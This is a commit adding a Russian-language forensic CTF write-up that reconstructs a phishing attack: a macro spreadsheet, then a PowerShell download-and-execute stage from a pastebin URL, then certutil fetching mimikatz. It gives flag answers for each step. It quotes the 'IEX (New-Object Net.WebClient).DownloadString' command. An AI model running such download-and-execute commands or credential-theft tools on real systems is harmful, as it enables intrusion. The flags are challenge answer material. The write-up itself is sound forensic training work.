Init. import
This commit is contained in:
Caplag
55
Imposter-Forensic/writeup.md
Normal file
55
Imposter-Forensic/writeup.md
Normal file
@@ -0,0 +1,55 @@
|
||||
## Q1) Укажите версию установленного Microsoft Office
|
||||
|
||||
1) Проверили файл `C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE`.
|
||||
2) Из PE‑ресурса `FileVersion/ProductVersion` получил версию.
|
||||
|
||||
Итог: `caplag{12.0.4518.1014}`
|
||||
|
||||
## Q2) Определите начальный вектор атаки. Укажите почту, откуда пришел вирусный файл и название файла (с расширением). формат: email_filename
|
||||
|
||||
1) В профиле Thunderbird открыли письмо: `C:\Users\PC31\AppData\Roaming\thunderbird\Profiles\g59pkejj.default-release\Mail\Local Folders\mail.eml`.
|
||||
2) В заголовках письма: `From: "HR Department" <hr@gdhwiXzuedhi.org>`.
|
||||
3) Во вложениях письма: `filename="shtatnoe-raspisanie.xlsm"`.
|
||||
|
||||
Итог: `caplag{hr@gdhwiXzuedhi.org_shtatnoe-raspisanie.xlsm}`
|
||||
|
||||
## Q3) Укажите ссылку, которая использовалась для загрузки и запуска второй стадии атаки
|
||||
|
||||
1) Открыли `C:\Users\PC31\Documents\shtatnoe-raspisanie.xlsm`.
|
||||
2) `olevba` показал `Workbook_Open`, где строка дважды декодируется из base64.
|
||||
3) После декодирования получен URL: `https://pastebin.com/raw/hz2rEByR`, который передается в `powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(...)`.
|
||||
|
||||
Итог: `caplag{https://pastebin.com/raw/hz2rEByR}`
|
||||
|
||||
## Q4) Через Reverse shell хакер скачал еще один вредоносный файл для третей стадии атаки. Укажите URL
|
||||
|
||||
1) Открыли кеш загрузок CryptoAPI: `C:\Users\PC31\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E417CD142DEC44E17C581F01DB81204`.
|
||||
2) Внутри файла в UTF‑16LE хранится полный URL загрузки архива.
|
||||
|
||||
Итог: `caplag{https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip}`
|
||||
|
||||
## Q5) Укажите полный путь к архиву где лежит mimikatz и название программы (c расширением) с помощью которой хакер скачал его. формат: Path_filename
|
||||
|
||||
1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` (после распаковки MAM/LZXPRESS‑Huffman) в списке ссылок указаны файлы:
|
||||
- `C:\Users\PC31\AppData\Local\Temp\.settings.zip`
|
||||
- `C:\Windows\SysWOW64\certutil.exe`
|
||||
2) Это подтверждает, что архив с mimikatz сохранен как `.settings.zip`, а скачивание выполнено `certutil.exe`.
|
||||
|
||||
Итог: `caplag{C:\Users\PC31\AppData\Local\Temp\.settings.zip_certutil.exe}`
|
||||
|
||||
## Q6) Укажите полную дату последнего запуска certutil.exe и кол-во запусков этой программы. формат: дд.мм.гггг/чч:мм:cc_count.
|
||||
|
||||
1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` распаковали MAM‑блок (LZXPRESS‑Huffman).
|
||||
2) В распакованном файле:
|
||||
- `last_run_time` (FILETIME) находится по смещению `0x80` → `2025‑06‑30 12:18:36Z` (UTC).
|
||||
- `run_count` (DWORD) по смещению `0xC8` → `1`.
|
||||
3) Перевод в локальное время (UTC+3) дает `30.06.2025 15:18:36`.
|
||||
|
||||
Итог: `caplag{30.06.2025/15:18:36_1}`
|
||||
|
||||
## Q7) Укажите сайт который пользователь посетил больше всего
|
||||
|
||||
1) История браузера пользователя находится в Edge: `C:\Users\PC31\AppData\Local\Microsoft\Edge\User Data\Default\History`.
|
||||
2) В SQLite‑таблице `urls` максимальный `visit_count` у страниц домена `unisender.com`.
|
||||
|
||||
Итог: `caplag{https://www.unisender.com}`
|
||||
Reference in New Issue
Block a user